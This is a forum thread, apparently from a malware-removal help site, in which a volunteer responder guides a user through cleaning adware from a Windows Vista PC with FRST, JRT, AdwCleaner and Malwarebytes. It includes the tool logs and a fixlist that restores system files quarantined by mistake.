C:\Windows\System32\cmd.exe => moved successfully
C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk => moved successfully
C:\Windows\System32\mshta.exe => moved successfully
hklm\System\CurrentControlSet\Control\Session Manager\\BootExecute => value restored successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
"HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
HKLM\Software\Microsoft\Internet Explorer\URLSearchHooks\\{f0e98552-8e47-4c6c-9b3a-11ab0549f94d} => value removed successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102}" => key removed successfully.
HKCR\CLSID\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} => key not found.
"HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102}" => key removed successfully.
HKCR\CLSID\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{ba00b7b1-0351-477a-b948-23e3ee5a73d4} => value removed successfully.
HKCR\CLSID\{ba00b7b1-0351-477a-b948-23e3ee5a73d4} => key not found.
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value removed successfully.
HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => key not found.
"HKLM\Software\MozillaPlugins\@exent.com/npExentCtl,version=7.0.0.0" => key removed successfully.
"HKLM\Software\MozillaPlugins\www.exent.com/GameTreatWidget" => key removed successfully.
ADASPROT => service removed successfully.
catchme => service removed successfully.
EraserUtilDrv11010 => service removed successfully.
lv321av => service removed successfully.
SymIMMP => service removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{009FF3C0-2C63-45C9-9B64-43C4F90DF8E4}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{009FF3C0-2C63-45C9-9B64-43C4F90DF8E4}" => key removed successfully.
C:\Windows\System32\Tasks\LaunchSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{46915187-2476-47E8-A559-AC136E5B9623}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46915187-2476-47E8-A559-AC136E5B9623}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater26278.exe" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{620CA66F-41E3-47CB-BEBA-F53DCCFBE17C}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{620CA66F-41E3-47CB-BEBA-F53DCCFBE17C}" => key removed successfully.
C:\Windows\System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7405A8FC-F14B-4911-951F-71D63B7EBC89}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A}" => key removed successfully.
C:\Windows\System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C}" => key removed successfully.
HKLM\Software\Classes\cmdfile\DefaultIcon\\Default => value restored successfully
"HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f" => key removed successfully.

========= REG DELETE "HKEY_CURRENT_USER\SOFTWARE\jiun" /f =========



========= End of Reg: =========


========= TYPE "C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat" =========


========= End ofCMD: =========

"C:\Program Files\Advanced System Optimizer 3" => not found.
"C:\Program Files\Free Ride Games" => not found.
"C:\Program Files\MyPC Backup" => not found.
C:\Program Files\Common Files\Symantec Shared => moved successfully
"C:\Users\Scott\AppData\Local" => Warning: FRST is scripted not to move this directory.
C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk => moved successfully
C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat => moved successfully
C:\Users\Scott\AppData\Roaming\0a30ba => moved successfully
"C:\Windows\system32\DRIVERS\lv321av.sys" => not found.
"C:\Windows\system32\DRIVERS\SymIM.sys" => not found.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 76223406 B
Java, Flash, Steam htmlcache => 558546 B
Windows/system/drivers => 4713206 B
Edge => 0 B
Chrome => 0 B
Firefox => 199641143 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 33125 B
Public => 0 B
ProgramData => 0 B
systemprofile => 918091 B
LocalService => 66228 B
NetworkService => 66228 B
Scott => 113056971 B

RecycleBin => 0 B
EmptyTemp: => 385 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 20:24:54 ====



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:09 PM

Posted 03 August 2016 - 07:02 AM

JRT is probably not working because the fix I gave you mistakenly quarantined CMD.exe (it's my fault). Follow the instructions below please.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    
    RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\cmd.exe.xBAD
    RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\mshta.exe.xBAD
    
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 03 August 2016 - 08:33 AM

Ok, here we go - logs from the 3 programs - just a reminder that I couldn't find Quickshare to uninstall. I also want to uninstall IE but cannot find it among programs to uninstall.

Thanks.

 

 

Fix result of Farbar Recovery Scan Tool (x86) Version: 27-07-2016
Ran by Scott (2016-08-03 08:51:25) Run:2
Running from C:\Users\Scott\Desktop
Loaded Profiles: Scott (Available Profiles: Scott)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CloseProcesses:

RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\cmd.exe.xBAD
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\mshta.exe.xBAD
*****************

Processes closed successfully.
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\cmd.exe.xBAD=> Restoring from Quarantine completed.
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\mshta.exe.xBAD=> Restoring from Quarantine completed.


The system needed a reboot.

==== End of Fixlog 08:51:26 ====

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.7 (07.03.2016)
Operating System: Windows Vista ™ Home Premium x86
Ran by Scott (Administrator) on Wed 08/03/2016 at  9:09:26.18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0




Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 08/03/2016 at  9:11:20.37
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

# AdwCleaner v5.201 - Logfile created 03/08/2016 at 09:19:35
# Updated 30/06/2016 by ToolsLib
# Database : 2016-08-02.3 [Server]
# Operating system : Windows Vista ™ Home Premium Service Pack 2 (X86)
# Username : Scott - 45TH
# Running from : C:\Users\Scott\Desktop\AdwCleaner.exe
# Option : Clean
# Support : https://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\Users\Scott\AppData\Local\jZip

***** [ Files ] *****

[-] File Deleted : C:\Program Files\Mozilla Firefox\browser\searchplugins\Ask.xml

***** [ DLLs ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{425E7597-03A2-338D-B72A-0E51FFE77A7E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{915BB7D5-082E-3B91-B1E0-45B5FDE01F24}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{2009AF2F-5786-3067-8799-B97F7832FDD6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{FB2E65F4-5687-33EF-9BBF-4E3C9C98D3B9}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppPath\jZip.exe
[-] Key Deleted : HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.apn.native_messaging_host_aaaaafeopjhkcolncjbedbhofpocmdbn
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\jZipShell.DLL
[-] Value Deleted : HKLM\SOFTWARE\RegisteredApplications [jZip]
[-] Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\aaaaafeopjhkcolncjbedbhofpocmdbn
[-] Key Deleted : HKLM\SOFTWARE\Classes\GameTreatWidget.GameTreatWidget.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\jZip.file
[-] Key Deleted : HKLM\SOFTWARE\Classes\jZipShell.jZipShellExt
[-] Key Deleted : HKLM\SOFTWARE\Classes\jZipShell.jZipShellExt.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\SelectionLinksv4.SelectionLinksBHO
[-] Key Deleted : HKLM\SOFTWARE\Classes\SelectionLinksv4.SelectionLinksBHO.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
[-] Key Deleted : HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\YMERemote.YMERemoteCtl
[-] Key Deleted : HKLM\SOFTWARE\Classes\YMERemote.YMERemoteCtl.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{3ED98568-A949-49CB-8ED0-3A703F6D4166}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{44D07CAA-4FC4-5A84-9951-A485AD808D0E}
[-] Key Deleted : HKCU\Software\APNDTX
[-] Key Deleted : HKCU\Software\jZip
[-] Key Deleted : HKLM\SOFTWARE\jZip
[-] Key Deleted : HKLM\SOFTWARE\Yahoo\Companion
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\imeshjzipmusictoolbarIE
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\jZip
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\MyPC Backup

***** [ Web browsers ] *****


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [3018 bytes] - [03/08/2016 09:19:35]
C:\AdwCleaner\AdwCleaner[R0].txt - [17486 bytes] - [13/02/2006 01:46:08]
C:\AdwCleaner\AdwCleaner[S0].txt - [17410 bytes] - [13/02/2006 01:48:36]
C:\AdwCleaner\AdwCleaner[S1].txt - [3638 bytes] - [03/08/2016 09:15:46]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [3312 bytes] ##########
 



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:09 PM

Posted 03 August 2016 - 08:39 AM

You cannot uninstall Internet Explorer since it's part of Windows, however you can disable it.

http://www.tomshardware.com/faq/id-2320344/disable-internet-explorer-windows-vista.html

As for Linkury, we'll address it after running a scan with Malwarebytes (because I think it targets it, so it might remove it).

0isDeWa.pngMalwarebytes Anti-Malware - Clean Mode
  • Download and install the free version of Malwarebytes Anti-Malware
    Note: It's your choice if you want to enable the free trial of Malwarebytes Premium or not. Enabling it will give you real-time protection from the program, as well as access to all the Premium features.
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the Update Now button;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run, the time required to complete the scan depends of your system and computer specs;
  • Once the scan is complete, make sure that the checkbox by Threat is checked (it means that every item detected is checked), then click on the Remove Selected button;
  • Click on Save Results after the deletion (in the bottom-right corner) and select Copy to clipboard. Paste the content in your next reply;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 03 August 2016 - 11:04 AM

I'll run Malwarebytes but wanted to let you know that as of now, about the only thing functioning on my machine is the ability to go online. I cannot load photos (need for online sales) and cannot use OpenOffice as files are coming up as corrupt & not repairable. Windows Photo Gallery is also partly inoperable as it says I don't have permission. There's also a problem accessing all my back-up files on the Toshiba drive - cannot open text files or images!!

 

Do you see these applications being restored? I'm feeling desperate. I'm a writer & sell online and my two avenues for doing both are both not working.



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:09 PM

Posted 03 August 2016 - 11:06 AM

I have a small idea of what could cause these issues and how to solve them, though right now we need to make sure your system is clean before moving on, since malware can get in the ways of our future repairs.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#13 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 03 August 2016 - 11:10 AM

I appreciate your confidence. I have books at risk. Losing them would be... can't think of a word to describe the feeling.


Edited by vistanovice, 03 August 2016 - 11:12 AM.


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:09 PM

Posted 03 August 2016 - 11:28 AM

If you are afraid of losing your files, you should back them up before proceeding with the clean-up. Not only will it act as your safety if anything should happen, it's also one of the basics when it comes to practicing safe computing :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 03 August 2016 - 01:07 PM

I have them backed up on the removable drive. This is the Toshiba drive I referred to.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users